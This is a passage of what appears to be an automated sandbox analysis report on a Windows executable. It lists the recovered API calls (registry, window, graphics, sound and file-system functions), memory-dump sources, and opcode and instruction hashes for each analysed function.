                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001B86AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 05e3f23764e3de8ef0b510998d6e6f3a9302900f74c788e9cb9cf6b52044e191
                                                          • Instruction ID: 51afe1f9a19e4b7de575d4cd6d6e344f96245cfa42fc72a206919312a9bf29b4
                                                          • Opcode Fuzzy Hash: 05e3f23764e3de8ef0b510998d6e6f3a9302900f74c788e9cb9cf6b52044e191
                                                          • Instruction Fuzzy Hash: 7641F775600209AFDB119FA9DC88EAA7BBCFF89B15F104259F909E7260DB709941CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 00191502
                                                          • VariantCopy.OLEAUT32(?,?), ref: 0019150B
                                                          • VariantClear.OLEAUT32(?), ref: 00191517
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001915FB
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00191657
                                                          • VariantInit.OLEAUT32(?), ref: 00191708
                                                          • SysFreeString.OLEAUT32(?), ref: 0019178C
                                                          • VariantClear.OLEAUT32(?), ref: 001917D8
                                                          • VariantClear.OLEAUT32(?), ref: 001917E7
                                                          • VariantInit.OLEAUT32(00000000), ref: 00191823
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 1234038744-3931177956
                                                          • Opcode ID: ac7307066c8a81c078e7b6d60c88a47db503ba5f425b21d722c7e5de76cb5745
                                                          • Instruction ID: bca642faf9796248fb9626aefa74a2f81cf36343c5e5124c054170c0bb84195e
                                                          • Opcode Fuzzy Hash: ac7307066c8a81c078e7b6d60c88a47db503ba5f425b21d722c7e5de76cb5745
                                                          • Instruction Fuzzy Hash: 15D10631A00116FBEF089FA5E885B7DB7B5BF45700F12805AF446AB590DB30DD92DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001AB6F4
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001AB772
                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 001AB80A
                                                          • RegCloseKey.ADVAPI32(?), ref: 001AB87E
                                                          • RegCloseKey.ADVAPI32(?), ref: 001AB89C
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001AB8F2
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001AB904
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001AB922
                                                          • FreeLibrary.KERNEL32(00000000), ref: 001AB983
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001AB994
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 146587525-4033151799
                                                          • Opcode ID: 53592d928b5a1e1c4cf40ed344e2efe5e5d12e1fe12aa0b3b1cc91ecd7ac3e6e
                                                          • Instruction ID: b3a2f4749b089407a60947802004a2cb1a8f10ffcc99c4dc80863dbcdc26d750
                                                          • Opcode Fuzzy Hash: 53592d928b5a1e1c4cf40ed344e2efe5e5d12e1fe12aa0b3b1cc91ecd7ac3e6e
                                                          • Instruction Fuzzy Hash: 22C18A78208281EFD714DF28C494F2ABBE5BF85308F14855CF59A8B6A2CB75EC45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 001A25D8
                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001A25E8
                                                          • CreateCompatibleDC.GDI32(?), ref: 001A25F4
                                                          • SelectObject.GDI32(00000000,?), ref: 001A2601
                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001A266D
                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001A26AC
                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001A26D0
                                                          • SelectObject.GDI32(?,?), ref: 001A26D8
                                                          • DeleteObject.GDI32(?), ref: 001A26E1
                                                          • DeleteDC.GDI32(?), ref: 001A26E8
                                                          • ReleaseDC.USER32(00000000,?), ref: 001A26F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 003548b84cc3f4b3bdd0483486eb2679e82c7e3149634bd7dc5818e5e5f75cdc
                                                          • Instruction ID: def42bbc099e4a0f75f853aa2054e61e21ec755d20e8cc44115155bd8cf86a69
                                                          • Opcode Fuzzy Hash: 003548b84cc3f4b3bdd0483486eb2679e82c7e3149634bd7dc5818e5e5f75cdc
                                                          • Instruction Fuzzy Hash: 3B61E475D00219EFCF04CFA8D984EAEBBB6FF58310F208529E955A7250D770A941CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 0015DAA1
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D659
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D66B
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D67D
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D68F
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6A1
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6B3
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6C5
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6D7
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6E9
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D6FB
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D70D
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D71F
                                                            • Part of subcall function 0015D63C: _free.LIBCMT ref: 0015D731
                                                          • _free.LIBCMT ref: 0015DA96
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          • _free.LIBCMT ref: 0015DAB8
                                                          • _free.LIBCMT ref: 0015DACD
                                                          • _free.LIBCMT ref: 0015DAD8
                                                          • _free.LIBCMT ref: 0015DAFA
                                                          • _free.LIBCMT ref: 0015DB0D
                                                          • _free.LIBCMT ref: 0015DB1B
                                                          • _free.LIBCMT ref: 0015DB26
                                                          • _free.LIBCMT ref: 0015DB5E
                                                          • _free.LIBCMT ref: 0015DB65
                                                          • _free.LIBCMT ref: 0015DB82
                                                          • _free.LIBCMT ref: 0015DB9A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 2ce5a1da482f361c99b039f7b8ed8ceabe027100e0f0cadc8a75d085c873081c
                                                          • Instruction ID: 945c855cfb420bff0f283ca668b0ac3a4a860912e311d8e4c2ced25a69ef4893
                                                          • Opcode Fuzzy Hash: 2ce5a1da482f361c99b039f7b8ed8ceabe027100e0f0cadc8a75d085c873081c
                                                          • Instruction Fuzzy Hash: 96314D32604705DFEB31AA39E845B9A77E9FF12316F154419E869EF291DF31AC88C720
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0018369C
                                                          • _wcslen.LIBCMT ref: 001836A7
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00183797
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0018380C
                                                          • GetDlgCtrlID.USER32(?), ref: 0018385D
                                                          • GetWindowRect.USER32(?,?), ref: 00183882
                                                          • GetParent.USER32(?), ref: 001838A0
                                                          • ScreenToClient.USER32(00000000), ref: 001838A7
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00183921
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0018395D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                          • String ID: %s%u
                                                          • API String ID: 4010501982-679674701
                                                          • Opcode ID: 0d3324ad51d693bcab778ad896edf9d310b584586b4d1465eced84dc2099df43
                                                          • Instruction ID: c6a0e9cd4d09819d11a5f16fb3b94f30710f2aed0b2b81b7a8ff5e87c3a68e1c
                                                          • Opcode Fuzzy Hash: 0d3324ad51d693bcab778ad896edf9d310b584586b4d1465eced84dc2099df43
                                                          • Instruction Fuzzy Hash: 7591D471604606AFD718EF24C885FAAF7A9FF44714F044629F9A9C2190EB30EB45CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00184994
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 001849DA
                                                          • _wcslen.LIBCMT ref: 001849EB
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 001849F7
                                                          • _wcsstr.LIBVCRUNTIME ref: 00184A2C
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00184A64
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00184A9D
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00184AE6
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00184B20
                                                          • GetWindowRect.USER32(?,?), ref: 00184B8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                          • String ID: ThumbnailClass
                                                          • API String ID: 1311036022-1241985126
                                                          • Opcode ID: 22ae7580e67f0ee96f4da7f77ecb873534fb3ba7031df73d69f8843f3100edf5
                                                          • Instruction ID: 5672a855a3c3126d8e448265206954e50f20eaf333d96634bfc40db9cb7f8a3a
                                                          • Opcode Fuzzy Hash: 22ae7580e67f0ee96f4da7f77ecb873534fb3ba7031df73d69f8843f3100edf5
                                                          • Instruction Fuzzy Hash: DE91AC710042069BDB18EF14C985FAA77E9FF94314F04846AFD869A196EF30EE45CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001ACC64
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001ACC8D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001ACD48
                                                            • Part of subcall function 001ACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001ACCAA
                                                            • Part of subcall function 001ACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001ACCBD
                                                            • Part of subcall function 001ACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001ACCCF
                                                            • Part of subcall function 001ACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001ACD05
                                                            • Part of subcall function 001ACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001ACD28
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001ACCF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2734957052-4033151799
                                                          • Opcode ID: 21a147914df9dbe48204b1d62c34ec267d091d97bc82a89fdac8cc1c98c08a70
                                                          • Instruction ID: a24c1e89ff0810811d2cc5e99d1b273c7f77336230795d9d81f2c3f9d2fd09f8
                                                          • Opcode Fuzzy Hash: 21a147914df9dbe48204b1d62c34ec267d091d97bc82a89fdac8cc1c98c08a70
                                                          • Instruction Fuzzy Hash: 3931AD79901128BBDB209B95DC88EFFBB7CEF56750F000165F906E2241DB708A85DAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00193D40
                                                          • _wcslen.LIBCMT ref: 00193D6D
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00193D9D
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00193DBE
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00193DCE
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00193E55
                                                          • CloseHandle.KERNEL32(00000000), ref: 00193E60
                                                          • CloseHandle.KERNEL32(00000000), ref: 00193E6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 1149970189-3457252023
                                                          • Opcode ID: 14f476ebfd10f11d9d9d885deb203b6e37e458fb08450e297720491b45bde056
                                                          • Instruction ID: 2d0b4bfeaa9b45effb038a3cc0409e7c713d5fe605705e0432fa2b3f2f232d7d
                                                          • Opcode Fuzzy Hash: 14f476ebfd10f11d9d9d885deb203b6e37e458fb08450e297720491b45bde056
                                                          • Instruction Fuzzy Hash: 33317E76904209ABDB219FA0DC49FEB37BDEF88700F5041B5F619D6160EB7497848B64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • timeGetTime.WINMM ref: 0018E6B4
                                                            • Part of subcall function 0013E551: timeGetTime.WINMM(?,?,0018E6D4), ref: 0013E555
                                                          • Sleep.KERNEL32(0000000A), ref: 0018E6E1
                                                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0018E705
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0018E727
                                                          • SetActiveWindow.USER32 ref: 0018E746
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0018E754
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0018E773
                                                          • Sleep.KERNEL32(000000FA), ref: 0018E77E
                                                          • IsWindow.USER32 ref: 0018E78A
                                                          • EndDialog.USER32(00000000), ref: 0018E79B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 124153c5d7d7099c8e12ef1d3e6527027c34543059bf4bee63e316656c894983
                                                          • Instruction ID: 11b7b94453a044d248d0b686b5147b003e7a3d015f7e79356ac8e5eb963a528c
                                                          • Opcode Fuzzy Hash: 124153c5d7d7099c8e12ef1d3e6527027c34543059bf4bee63e316656c894983
                                                          • Instruction Fuzzy Hash: 532154B0200205AFEB106F64ECC9E353BA9F754759F601525F916C29B1DBB1AD80DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0018EA5D
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0018EA73
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018EA84
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0018EA96
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0018EAA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: SendString$_wcslen
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2420728520-1007645807
                                                          • Opcode ID: 28e92a085a408fb28af919f66b4680813c9f1fce2ea07118da2b60fb73fc5190
                                                          • Instruction ID: f90502d1a80df1cda67381aefa942b7fdbb2221a7db6028a17daec3114a5133b
                                                          • Opcode Fuzzy Hash: 28e92a085a408fb28af919f66b4680813c9f1fce2ea07118da2b60fb73fc5190
                                                          • Instruction Fuzzy Hash: 6B1124316502697DD724F766EC4ADFF6ABCEBE1F44F400429B411A20D1EF705A55CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 00185CE2
                                                          • GetWindowRect.USER32(00000000,?), ref: 00185CFB
                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00185D59
                                                          • GetDlgItem.USER32(?,00000002), ref: 00185D69
                                                          • GetWindowRect.USER32(00000000,?), ref: 00185D7B
                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00185DCF
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00185DDD
                                                          • GetWindowRect.USER32(00000000,?), ref: 00185DEF
                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00185E31
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00185E44
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00185E5A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00185E67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 84e46a693d30d24681fff0ee7358e3d50dbd4dd18ab35491efcd31acde74e53e
                                                          • Instruction ID: 40897ce5066d6158d2f1bbebd3fe4abd5694bfd2fff4d7d89c221a22b6737bd3
                                                          • Opcode Fuzzy Hash: 84e46a693d30d24681fff0ee7358e3d50dbd4dd18ab35491efcd31acde74e53e
                                                          • Instruction Fuzzy Hash: 10510071A00605AFDF18DFA8DD89AAEBBB6FB48300F148229F915E6690D7709E44CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00138F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00138BE8,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 00138FC5
                                                          • DestroyWindow.USER32(?), ref: 00138C81
                                                          • KillTimer.USER32(00000000,?,?,?,?,00138BBA,00000000,?), ref: 00138D1B
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00176973
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 001769A1
                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 001769B8
